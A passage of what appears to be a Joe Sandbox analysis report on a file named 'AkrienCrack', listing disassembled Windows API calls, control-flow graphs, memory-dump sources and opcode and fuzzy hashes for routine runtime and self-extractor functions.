              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: File$CreateErrorLast$Time
              • String ID:
              • API String ID: 1999340476-0
              • Opcode ID: a2710cc0e3c25cdb12fd08cacb710dc1f59b9fa06f33b8b5851986409bec208f
              • Instruction ID: 124008ae29f8b4aa0b9e0fd3e94966f02e528e7030dc7e3c1a3af42e54a6b839
              • Opcode Fuzzy Hash: a2710cc0e3c25cdb12fd08cacb710dc1f59b9fa06f33b8b5851986409bec208f
              • Instruction Fuzzy Hash: B54145305447466FE7208B20CC4ABDBBBD4FB01724F100759F9E4961D1E7B5AA88EB95

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 999 b5ac74-b5ac8d PeekMessageW 1000 b5ac8f-b5aca3 GetMessageW 999->1000 1001 b5acc8-b5accc 999->1001 1002 b5aca5-b5acb2 IsDialogMessageW 1000->1002 1003 b5acb4-b5acc2 TranslateMessage DispatchMessageW 1000->1003 1002->1001 1002->1003 1003->1001
              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5AC85
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5AC96
              • IsDialogMessageW.USER32(000501F6,?), ref: 00B5ACAA
              • TranslateMessage.USER32(?), ref: 00B5ACB8
              • DispatchMessageW.USER32(?), ref: 00B5ACC2
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Message$DialogDispatchPeekTranslate
              • String ID:
              • API String ID: 1266772231-0
              • Opcode ID: 9e1d09e8111e9791566723855a485de0369079eee927e904b3d55728213d9fa9
              • Instruction ID: 428611f309696f69fece171d37f039026a1d709d696371a04fedf5058e152f41
              • Opcode Fuzzy Hash: 9e1d09e8111e9791566723855a485de0369079eee927e904b3d55728213d9fa9
              • Instruction Fuzzy Hash: 9AF01D71901129AB8B309BE59C4DEEB7FACEE062517404555F915D3110EA24D405C7B1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1004 b5a2c7-b5a2e6 GetClassNameW 1005 b5a30e-b5a310 1004->1005 1006 b5a2e8-b5a2fd call b517ac 1004->1006 1008 b5a312-b5a315 SHAutoComplete 1005->1008 1009 b5a31b-b5a31f 1005->1009 1011 b5a30d 1006->1011 1012 b5a2ff-b5a30b FindWindowExW 1006->1012 1008->1009 1011->1005 1012->1011
              APIs
              • GetClassNameW.USER32(?,?,00000050), ref: 00B5A2DE
              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00B5A315
                • Part of subcall function 00B517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B4BB05,00000000,.exe,?,?,00000800,?,?,00B585DF,?), ref: 00B517C2
              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B5A305
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AutoClassCompareCompleteFindNameStringWindow
              • String ID: EDIT
              • API String ID: 4243998846-3080729518
              • Opcode ID: d029726d733942bcd1392c5b5aec4acf306af25c1678cbfe60f3249fbf622e72
              • Instruction ID: 72e20bed0285ff2d89b35aa1aa73fc9d603a0006d7271c76a8f1f2a35483d809
              • Opcode Fuzzy Hash: d029726d733942bcd1392c5b5aec4acf306af25c1678cbfe60f3249fbf622e72
              • Instruction Fuzzy Hash: EAF08232A0122877E73157689C06F9B77ACDB46B12F0401D6BD05B3180DB609D49C6FA

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1013 b5d287-b5d2b2 call b5e360 SetEnvironmentVariableW call b4fbd8 1017 b5d2b7-b5d2bb 1013->1017 1018 b5d2bd-b5d2c1 1017->1018 1019 b5d2df-b5d2e3 1017->1019 1020 b5d2ca-b5d2d1 call b4fcf1 1018->1020 1023 b5d2c3-b5d2c9 1020->1023 1024 b5d2d3-b5d2d9 SetEnvironmentVariableW 1020->1024 1023->1020 1024->1019
              APIs
              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B5D29D
              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B5D2D9
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: EnvironmentVariable
              • String ID: sfxcmd$sfxpar
              • API String ID: 1431749950-3493335439
              • Opcode ID: 268387165a6e4b1a9bbf6a9dab7cbd22bc6d07a41147c370dea8e187542823d2
              • Instruction ID: f65989704412832076401868b65da7efa89292b81ba6c2dddc05f995edd23b29
              • Opcode Fuzzy Hash: 268387165a6e4b1a9bbf6a9dab7cbd22bc6d07a41147c370dea8e187542823d2
              • Instruction Fuzzy Hash: 38F0A072800228A6DB302F90DC0AFBA7BD8EF09B42F4041D1FC88A7151DA61CE84E7F1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1025 b4984e-b4985a 1026 b49867-b4987e ReadFile 1025->1026 1027 b4985c-b49864 GetStdHandle 1025->1027 1028 b49880-b49889 call b49989 1026->1028 1029 b498da 1026->1029 1027->1026 1033 b498a2-b498a6 1028->1033 1034 b4988b-b49893 1028->1034 1031 b498dd-b498e2 1029->1031 1035 b498b7-b498bb 1033->1035 1036 b498a8-b498b1 GetLastError 1033->1036 1034->1033 1037 b49895 1034->1037 1040 b498d5-b498d8 1035->1040 1041 b498bd-b498c5 1035->1041 1036->1035 1039 b498b3-b498b5 1036->1039 1038 b49896-b498a0 call b4984e 1037->1038 1038->1031 1039->1031 1040->1031 1041->1040 1043 b498c7-b498d0 GetLastError 1041->1043 1043->1040 1045 b498d2-b498d3 1043->1045 1045->1038
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 00B4985E
              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00B49876
              • GetLastError.KERNEL32 ref: 00B498A8
              • GetLastError.KERNEL32 ref: 00B498C7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ErrorLast$FileHandleRead
              • String ID:
              • API String ID: 2244327787-0
              • Opcode ID: 3ee5991c2c49cacb26eb0db13b291fef1301b5c173fcd0a63f77d4ea305905d7
              • Instruction ID: 04f1e3a146377f3e1301b245ad5fa5a8e22ac0f654df9dd02ed80bc7aacc2bae
              • Opcode Fuzzy Hash: 3ee5991c2c49cacb26eb0db13b291fef1301b5c173fcd0a63f77d4ea305905d7
              • Instruction Fuzzy Hash: 8C118230900214EBDB205B59C844A7B77E8FB47BB1F1086AAF46A86590DB359F40BF62
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00B63713,00000000,00000000,?,00B6A49B,00B63713,00000000,00000000,00000000,?,00B6A698,00000006,FlsSetValue), ref: 00B6A526
              • GetLastError.KERNEL32(?,00B6A49B,00B63713,00000000,00000000,00000000,?,00B6A698,00000006,FlsSetValue,00B77348,00B77350,00000000,00000364,?,00B69077), ref: 00B6A532
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B6A49B,00B63713,00000000,00000000,00000000,?,00B6A698,00000006,FlsSetValue,00B77348,00B77350,00000000), ref: 00B6A540
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              • Opcode ID: 606e9c673654748bea8ff2afcc6c4473c288dbaf5b1342ba48c42ea9d168439a
              • Instruction ID: 66c69555aa52d8b0ad3391c1cd8fe4c78c64e7e5c9a7a37a94a3e4272a30f64e
              • Opcode Fuzzy Hash: 606e9c673654748bea8ff2afcc6c4473c288dbaf5b1342ba48c42ea9d168439a
              • Instruction Fuzzy Hash: 4A01F732651222ABCF21CA689C44A567BDCEF65FA1B100560F90BF3140DB29D900CEE1
              APIs
              • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00B4CC94,00000001,?,?,?,00000000,00B54ECD,?,?,?), ref: 00B49F4C
              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00B54ECD,?,?,?,?,?,00B54972,?), ref: 00B49F8E
              • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00B4CC94,00000001,?,?), ref: 00B49FB8
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: FileWrite$Handle
              • String ID:
              • API String ID: 4209713984-0
              • Opcode ID: da635462cc0586ebaa75a5b7bea3f34aa42e82322a1ed05ac510f90da7ba8687
              • Instruction ID: 8be9c51c25c682da50a02b88a049ad1be6859519d8e2a7282d6abaee5db08cce
              • Opcode Fuzzy Hash: da635462cc0586ebaa75a5b7bea3f34aa42e82322a1ed05ac510f90da7ba8687
              • Instruction Fuzzy Hash: 813104312083059BDF109F14D84876BBBE8EB51B10F044598F949DB281CB70EA4CEBA2
              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A22E
              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A261
              • GetLastError.KERNEL32(?,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A27E
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CreateDirectory$ErrorLast
              • String ID:
              • API String ID: 2485089472-0
              • Opcode ID: 97fdb4d03b17e15641031f2d662d8cbc8649fb390297d2cd120a65d90d540787
              • Instruction ID: 24e7ec582d3bb229a975e9cb1747c6b32205b7016386330184911d0489dd1f05
              • Opcode Fuzzy Hash: 97fdb4d03b17e15641031f2d662d8cbc8649fb390297d2cd120a65d90d540787
              • Instruction Fuzzy Hash: 1701C03528021866DB22AB744C85BEE73DCEF06B41F0404D5F944D6051CBA2DB81BAA3
              APIs
              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00B6B019
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Info
              • String ID:
              • API String ID: 1807457897-3916222277
              • Opcode ID: e70c53d743be44381a87ddde2ca08fcb81897e7335602208f08dddf34ffca457
              • Instruction ID: 7ff5ab80d6289fdb607f49326576ec4a520ab935fd2085a9cc3d95cc0d64a518
              • Opcode Fuzzy Hash: e70c53d743be44381a87ddde2ca08fcb81897e7335602208f08dddf34ffca457
              • Instruction Fuzzy Hash: BB41F57150424CAADF218A248C95FF6BBF9DB46304F1404EDE59AD7142E339AA85DF20
              APIs
              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00B6A79D
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: String
              • String ID: LCMapStringEx
              • API String ID: 2568140703-3893581201
              • Opcode ID: c6df3aff47e67ae41f8bc16ee571f245dc88d4f00b7c9f4dd32c41a4d59439dd
              • Instruction ID: a39caf4e52aeaddbf68880dc20eb88405b79a98ee196a0ddc8988dbee92aa61c
              • Opcode Fuzzy Hash: c6df3aff47e67ae41f8bc16ee571f245dc88d4f00b7c9f4dd32c41a4d59439dd
              • Instruction Fuzzy Hash: 2B01D732544209BBCF025F90DC45DAE7FB6EF08760F058194FE2926161CA768971BB91
              APIs
              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00B69D2F), ref: 00B6A715
              Strings
              • InitializeCriticalSectionEx, xrefs: 00B6A6E5
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CountCriticalInitializeSectionSpin
              • String ID: InitializeCriticalSectionEx
              • API String ID: 2593887523-3084827643
              • Opcode ID: 3c835b8eea848d65560e492f9cd090005bce9b24528684363b91a457b6665d78
              • Instruction ID: 27eeac267288a9d141e566174048504679a758a12e2386f936d77ebab295d580
              • Opcode Fuzzy Hash: 3c835b8eea848d65560e492f9cd090005bce9b24528684363b91a457b6665d78
              • Instruction Fuzzy Hash: 4BF09A31645208BBCF116F60CC05DAE7FE1EF08B20B408094FC2E6A261DE719E51BB95
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Alloc
              • String ID: FlsAlloc
              • API String ID: 2773662609-671089009
              • Opcode ID: 125031c05c56458f6bc062ae59683c1dac61b0126fb730138d8dfcb16d3e3a49
              • Instruction ID: 931f49561f005d2005535eadd20312315e0a04e46a6ce92b3ae53756fd18c7bb
              • Opcode Fuzzy Hash: 125031c05c56458f6bc062ae59683c1dac61b0126fb730138d8dfcb16d3e3a49
              • Instruction Fuzzy Hash: 1FE0AB30B8522CABC720AB608C02DAEBBD0CF25B11B4140D5FC1E3B350CE748F01AADA
              APIs
              • try_get_function.LIBVCRUNTIME ref: 00B632AF
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: try_get_function
              • String ID: FlsAlloc
              • API String ID: 2742660187-671089009
              • Opcode ID: cddf55b9831ed223d60e6195da05a478cd526bea62bc62b1501e2c21616f5dcb
              • Instruction ID: 29f6d78572cd1a40576db444f6a965d0dcbed12c0a10aba5b43bcc016b32e06c
              • Opcode Fuzzy Hash: cddf55b9831ed223d60e6195da05a478cd526bea62bc62b1501e2c21616f5dcb
              • Instruction Fuzzy Hash: 04D02B21B807346A812032C06C03AEE7EC4C701FB2F4541D2FF1C3A15284E5D64051C5
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5E20B
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID: 3To
              • API String ID: 1269201914-245939750
              • Opcode ID: 1a844c4c1e69dcb2ef28654141c6931793d6224abc53955b1594e15e4a008527
              • Instruction ID: 11a15a8b6ebdf67d09cd087e2689c69b7bdf35db8e29d7886438d65482fdddd6
              • Opcode Fuzzy Hash: 1a844c4c1e69dcb2ef28654141c6931793d6224abc53955b1594e15e4a008527
              • Instruction Fuzzy Hash: D3B0129226E101FD321C52047D06F3603DCC4C0B52330C5DABD29D408095419D0D4832
              APIs
                • Part of subcall function 00B6AF1B: GetOEMCP.KERNEL32(00000000,?,?,00B6B1A5,?), ref: 00B6AF46
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B6B1EA,?,00000000), ref: 00B6B3C4
              • GetCPInfo.KERNEL32(00000000,00B6B1EA,?,?,?,00B6B1EA,?,00000000), ref: 00B6B3D7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CodeInfoPageValid
              • String ID:
              • API String ID: 546120528-0
              • Opcode ID: 96814b49e7f87b344413ea2b9815d19a1d910b300bee3b38033ab5650d68c795
              • Instruction ID: 9cf9c9f65e8f234febe38c9e1977b1b00baf1c22275ad32b8907aa17a1c8e2ad
              • Opcode Fuzzy Hash: 96814b49e7f87b344413ea2b9815d19a1d910b300bee3b38033ab5650d68c795
              • Instruction Fuzzy Hash: 01511270A002059EDB209F35C891ABABBF5EF55310F1884EED096CB253DB3DD985CB91
              APIs
              • __EH_prolog.LIBCMT ref: 00B41385
                • Part of subcall function 00B46057: __EH_prolog.LIBCMT ref: 00B4605C
                • Part of subcall function 00B4C827: __EH_prolog.LIBCMT ref: 00B4C82C
                • Part of subcall function 00B4C827: new.LIBCMT ref: 00B4C86F
                • Part of subcall function 00B4C827: new.LIBCMT ref: 00B4C893
              • new.LIBCMT ref: 00B413FE
                • Part of subcall function 00B4B07D: __EH_prolog.LIBCMT ref: 00B4B082
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 64c30a784057183f5de529180dbecfb249c8314745401d151f4571220bf67e17
              • Instruction ID: db870c0f81f7ab0a86e5eb855655cc6d9ab4576cd438738dcde0aacfb9a0c867
              • Opcode Fuzzy Hash: 64c30a784057183f5de529180dbecfb249c8314745401d151f4571220bf67e17
              • Instruction Fuzzy Hash: 4B4129B0805B409EE724DF798485AE7FBE5FF18310F5049AED5EE83282DB326654CB15
              APIs
              • __EH_prolog.LIBCMT ref: 00B41385
                • Part of subcall function 00B46057: __EH_prolog.LIBCMT ref: 00B4605C
                • Part of subcall function 00B4C827: __EH_prolog.LIBCMT ref: 00B4C82C
                • Part of subcall function 00B4C827: new.LIBCMT ref: 00B4C86F
